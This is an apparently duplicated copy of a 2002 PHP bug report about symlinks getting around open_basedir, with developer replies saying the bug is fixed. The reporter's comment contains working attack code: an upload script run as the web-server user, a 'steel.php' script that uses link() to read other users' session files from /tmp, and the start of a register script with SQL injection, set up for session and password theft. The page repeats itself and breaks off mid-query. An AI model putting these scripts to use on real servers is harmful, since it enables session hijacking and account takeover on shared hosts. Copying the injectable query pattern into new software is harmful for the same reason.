#17790 [Com]: symlinks circumvent open_basedir restrictions
ID: 17790 Comment by: devdas_kantee at hotmail dot com Reported By: tozz at kijkt dot tv Status: Closed Bug Type: Filesystem function related Operating System: Linux PHP Version: 4.2.1 New Comment: hi Previous Comments: [2002-06-16 17:28:31] [EMAIL PROTECTED] This bug has been fixed in CVS. You can grab a snapshot of the CVS version at http://snaps.php.net/. In case this was a documentation problem, the fix will show up soon at http://www.php.net/manual/. In case this was a PHP.net website problem, the change will show up on the PHP.net site and on the mirror sites. Thank you for the report, and for helping us make PHP better. symlink and link now perfom an openbasedir and uid check for link and for its target. anyway the situation you describe is caused by a totally misconfigured server. document root directories should never ever be writeable for the apache user. thats a generic rule and disobeying it is a security hole. [2002-06-16 16:55:49] bastijs at net-force dot nl well, this is possible because of the move_uploaded_file + the link function. move_uploaded_file will change your own UID to 48 apache so you will be able to read files from the /tmp dir if you link the /tmp directory to your own made tmp directory So I think it`s a PHP bug. cya, BasTijs [2002-06-16 16:42:06] [EMAIL PROTECTED] The session stealing stuff is only possible because of a great flaw in the upload script. That's not a problem in PHP. Safe mode is not safe. But tbese are things that should not be managed by PHP, but by the OS. Apache 2 solves this problem with the Perchild MPM. Safe mode tries to solve this problem, but it can't completely. Read the php-dev archives for more about this. What remains is that symlinks might be able to work around open_basedir restrictions. That should not be possible. Reclassified. [2002-06-16 16:24:36] tozz at kijkt dot tv Stealing PHP sessions + Break PHP safe_mode + Break PHP open_basedir This file includes 2 new PHP bugs + a guide on how to use cross scripting to steal sessions + passwords PHP bugs: 1) Break safe_mode restriction using move_uploaded_file. 2) Break open_basedir restriction using the PHP link function This script will upload a file to the dir /css/ op my website http://www.net-force.nl/css/ Because the move_upload_file changes the users from my own name- bastijs ID 566 to apache ID 48 I will be able to break the safe_mode restriction and read files from the /tmp/ directory with my steel.php script. ( Chmod 777 /css/ ) upload.php ++ ? $file = $HTTP_POST_FILES['file']['name']; $type = $HTTP_POST_FILES['file']['type']; $size = $HTTP_POST_FILES['file']['size']; $temp = $HTTP_POST_FILES['file']['tmp_name']; $size_limit = 10; // set size limit in bytes if ($file){ if ($size $size_limit){ move_uploaded_file($temp,/domains/net-force.nl/public_html/www/css/ .$file); echo File tt$file/tt uploaded!; } else { echo Sorry, your file exceeds the size limit of $size_limit bytes; }} echo form enctype='multipart/form-data' action=$PHP_SELF method=post Upload a file: input name='file' type='file' input type='submit' value='Upload' /form ; ? ++ This script will steal a session from the tmp dir and place a file named $sessie.txt in your own temp dir, I used - http://www.net-force.nl/css/tmp/ so I will get a file called http://www.net-force.nl/css/tmp/88618d3d4af0bb8bd5135472c02e8ecc.txt If my session ID was: 88618d3d4af0bb8bd5135472c02e8ecc I used the link function to break the open_basedir restriction so I was able to view the file. steel.php ++ ? if(IsSet($submit) $submit == steel){ link(/tmp/sess_ . $sessie, tmp/$sessie.txt); $file = file(tmp/$sessie.txt); echo $file[0]; }else{ echo form method=\post\ action=\$PHP_SELF\ Sessie:br input type=\text\ name=\sessie\br input type=\submit\ name=\submit\ value=\steel\ /form ; } ? ++ Now I`m gonna test the exploit and steel a session ID using the cross-scripting exploit. First I will create a table called css in MYSQL, edit the scripts for your own server. CREATE TABLE `css` ( `id` int(10) NOT NULL auto_increment, `naam` varchar(40) NOT NULL default '', `password` varchar(40) NOT NULL default '', PRIMARY KEY (`id`) ) TYPE=MyISAM; Now I will install an login + register script which will use sessions for auth. register.php ++ ? include('functions.php'); session_start(); if(IsSet($submit) $submit == register){ $Query = mysql_query(SELECT * FROM css WHERE naam='$naam', $db) or die(Error!); $info = mysql_fetch_array($Query); if($info['id'] != ){ die(error!); }else{ mysql_query(INSERT
#17790 [Com]: symlinks circumvent open_basedir restrictions
ID: 17790 Comment by: devdas_kantee at hotmail dot com Reported By: tozz at kijkt dot tv Status: Closed Bug Type: Filesystem function related Operating System: Linux PHP Version: 4.2.1 New Comment: hi Previous Comments: [2003-09-19 05:08:19] devdas_kantee at hotmail dot com hi [2002-06-16 17:28:31] [EMAIL PROTECTED] This bug has been fixed in CVS. You can grab a snapshot of the CVS version at http://snaps.php.net/. In case this was a documentation problem, the fix will show up soon at http://www.php.net/manual/. In case this was a PHP.net website problem, the change will show up on the PHP.net site and on the mirror sites. Thank you for the report, and for helping us make PHP better. symlink and link now perfom an openbasedir and uid check for link and for its target. anyway the situation you describe is caused by a totally misconfigured server. document root directories should never ever be writeable for the apache user. thats a generic rule and disobeying it is a security hole. [2002-06-16 16:55:49] bastijs at net-force dot nl well, this is possible because of the move_uploaded_file + the link function. move_uploaded_file will change your own UID to 48 apache so you will be able to read files from the /tmp dir if you link the /tmp directory to your own made tmp directory So I think it`s a PHP bug. cya, BasTijs [2002-06-16 16:42:06] [EMAIL PROTECTED] The session stealing stuff is only possible because of a great flaw in the upload script. That's not a problem in PHP. Safe mode is not safe. But tbese are things that should not be managed by PHP, but by the OS. Apache 2 solves this problem with the Perchild MPM. Safe mode tries to solve this problem, but it can't completely. Read the php-dev archives for more about this. What remains is that symlinks might be able to work around open_basedir restrictions. That should not be possible. Reclassified. [2002-06-16 16:24:36] tozz at kijkt dot tv Stealing PHP sessions + Break PHP safe_mode + Break PHP open_basedir This file includes 2 new PHP bugs + a guide on how to use cross scripting to steal sessions + passwords PHP bugs: 1) Break safe_mode restriction using move_uploaded_file. 2) Break open_basedir restriction using the PHP link function This script will upload a file to the dir /css/ op my website http://www.net-force.nl/css/ Because the move_upload_file changes the users from my own name- bastijs ID 566 to apache ID 48 I will be able to break the safe_mode restriction and read files from the /tmp/ directory with my steel.php script. ( Chmod 777 /css/ ) upload.php ++ ? $file = $HTTP_POST_FILES['file']['name']; $type = $HTTP_POST_FILES['file']['type']; $size = $HTTP_POST_FILES['file']['size']; $temp = $HTTP_POST_FILES['file']['tmp_name']; $size_limit = 10; // set size limit in bytes if ($file){ if ($size $size_limit){ move_uploaded_file($temp,/domains/net-force.nl/public_html/www/css/ .$file); echo File tt$file/tt uploaded!; } else { echo Sorry, your file exceeds the size limit of $size_limit bytes; }} echo form enctype='multipart/form-data' action=$PHP_SELF method=post Upload a file: input name='file' type='file' input type='submit' value='Upload' /form ; ? ++ This script will steal a session from the tmp dir and place a file named $sessie.txt in your own temp dir, I used - http://www.net-force.nl/css/tmp/ so I will get a file called http://www.net-force.nl/css/tmp/88618d3d4af0bb8bd5135472c02e8ecc.txt If my session ID was: 88618d3d4af0bb8bd5135472c02e8ecc I used the link function to break the open_basedir restriction so I was able to view the file. steel.php ++ ? if(IsSet($submit) $submit == steel){ link(/tmp/sess_ . $sessie, tmp/$sessie.txt); $file = file(tmp/$sessie.txt); echo $file[0]; }else{ echo form method=\post\ action=\$PHP_SELF\ Sessie:br input type=\text\ name=\sessie\br input type=\submit\ name=\submit\ value=\steel\ /form ; } ? ++ Now I`m gonna test the exploit and steel a session ID using the cross-scripting exploit. First I will create a table called css in MYSQL, edit the scripts for your own server. CREATE TABLE `css` ( `id` int(10) NOT NULL auto_increment, `naam` varchar(40) NOT NULL default '', `password` varchar(40) NOT NULL default '', PRIMARY KEY (`id`) ) TYPE=MyISAM; Now I will install an login + register script which will use sessions for auth. register.php ++ ? include('functions.php'); session_start(); if(IsSet($submit) $submit == register){ $Query = mysql_query(SELECT * FROM css WHERE naam